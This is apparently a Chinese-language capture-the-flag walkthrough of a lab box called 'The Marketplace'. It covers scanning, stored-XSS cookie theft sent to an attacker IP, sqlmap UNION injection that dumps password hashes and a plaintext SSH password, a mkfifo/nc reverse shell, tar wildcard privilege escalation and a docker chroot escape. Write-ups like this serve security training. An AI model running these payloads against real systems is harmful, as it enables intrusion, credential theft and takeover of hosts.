前言
bilibili:Zacarx
www.zacarx.com
nmap
┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.96.223
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:22 CST
Nmap scan report for 10.10.96.223 (10.10.96.223)
Host is up (0.27s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_ 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp open http nginx 1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
32768/tcp open http Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds
目录扫描
──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.198.229
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 25 22:42:22 2022
URL_BASE: http://10.10.198.229/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.198.229/ ----
+ http://10.10.198.229/admin (CODE:403|SIZE:392)
+ http://10.10.198.229/Admin (CODE:403|SIZE:392)
+ http://10.10.198.229/ADMIN (CODE:403|SIZE:392)
> Testing: http://10.10.198.229/hidden xss利用
nc -lnvp 4444
记得先进行监听后进行report
sqlmap进阶用法
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -dbs
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:39 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:55:46] [INFO] testing connection to the target URL
[20:55:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:55:50] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:55:52] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:56:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:56:06] [WARNING] reflective value(s) found and filtering out
[20:56:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:56:14] [INFO] target URL appears to have 4 columns in query
[20:56:25] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[20:56:25] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:56:40] [INFO] testing MySQL
[20:56:41] [INFO] confirming MySQL
[20:56:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, Express
back-end DBMS: MySQL >= 8.0.0
[20:56:51] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] marketplace
[20:56:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 10 times
[20:56:52] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'
[*] ending @ 20:56:52 /2022-10-25/
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:57:14 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] y
[20:57:17] [INFO] resuming back-end DBMS 'mysql'
[20:57:17] [INFO] testing connection to the target URL
[20:57:18] [CRITICAL] anti-CSRF token 'token' can't be found at 'http://10.10.96.223:80/admin?user=1'. You can try to rerun by providing a valid value for option '--csrf-url'
[*] ending @ 20:57:18 /2022-10-25/
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
___
__H__
___ ___[)]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:57:21 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:57:24] [INFO] resuming back-end DBMS 'mysql'
[20:57:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:57:25] [INFO] the back-end DBMS is MySQL
web application technology: Express, Nginx 1.19.2
back-end DBMS: MySQL 8
[20:57:25] [INFO] fetching tables for database: 'marketplace'
[20:57:26] [INFO] fetching columns for table 'items' in database 'marketplace'
[20:57:28] [INFO] fetching entries for table 'items' in database 'marketplace'
[20:57:29] [INFO] recognized possible password hashes in column 'image'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:57:39] [INFO] writing hashes to a temporary file '/tmp/sqlmaplnctc6c13775/sqlmaphashes-ft657rdv.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:57:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:57:53] [INFO] starting 4 processes
[20:58:03] [WARNING] no clear password(s) found
Database: marketplace
Table: items
[7 entries]
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| id | image | title | author | description |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| 1 | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2 | Good as new. |
| 2 | abffe546fb4cb740cc6b44f9e4c263df | A cactus | 3 | Yep, that's a cactus. |
| 3 | 598815c0f5554115631a3250e5db1719 | a | 4 | axxxxx |
| 4 | 598815c0f5554115631a3250e5db1719 | a | 4 | <script> alert(1) </script> |
| 5 | 598815c0f5554115631a3250e5db1719 | a | 4 | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script> |
| 6 | 598815c0f5554115631a3250e5db1719 | av | 4 | <script>fetch("http://10.10.96.223:4444/"+document.cookie)</script> |
| 7 | 598815c0f5554115631a3250e5db1719 | asa | 4 | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script> |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
[20:58:03] [INFO] table 'marketplace.items' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/items.csv'
[20:58:03] [INFO] fetching columns for table 'messages' in database 'marketplace'
[20:58:05] [INFO] fetching entries for table 'messages' in database 'marketplace'
Database: marketplace
Table: messages
[11 entries]
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | is_read | user_to | user_from | message_content |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | 1 | 3 | 1 | Hello!\r\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\r\nYour new password is: @b_ENXkGYUCAv3zJ |
| 2 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 3 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 4 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 5 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 6 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 7 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 8 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 9 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 10 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 11 | 0 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[20:58:06] [INFO] table 'marketplace.messages' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/messages.csv'
[20:58:06] [INFO] fetching columns for table 'users' in database 'marketplace'
[20:58:07] [INFO] fetching entries for table 'users' in database 'marketplace'
Database: marketplace
Table: users
[4 entries]
+----+--------------------------------------------------------------+----------+-----------------+
| id | password | username | isAdministrator |
+----+--------------------------------------------------------------+----------+-----------------+
| 1 | $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW | system | 0 |
| 2 | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q | michael | 1 |
| 3 | $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake | 1 |
| 4 | $2b$10$eWi7EwPf1euh6kC4AUM4iur1VWx4ZYG5EUUebOEO6cMVUUZTGYmsG | Zacarx | 0 |
+----+--------------------------------------------------------------+----------+-----------------+
[20:58:09] [INFO] table 'marketplace.users' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/users.csv'
[20:58:09] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'
[*] ending @ 20:58:09 /2022-10-25/
我们得知ssh密码 @b_ENXkGYUCAv3zJ,用户为system,maichael,jake其中的一个人
所以非常简单地我们就得到了一个shell
提权
通配符提权 - PENETRATION NOTE (heresecurity.wiki)
echo "mkfifo /tmp/lhennp; nc 10.17.0.91 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
sudo -u michael ./shell.shdocker逃逸
This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root.
Any other Docker Linux image should work, e.g., debian.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
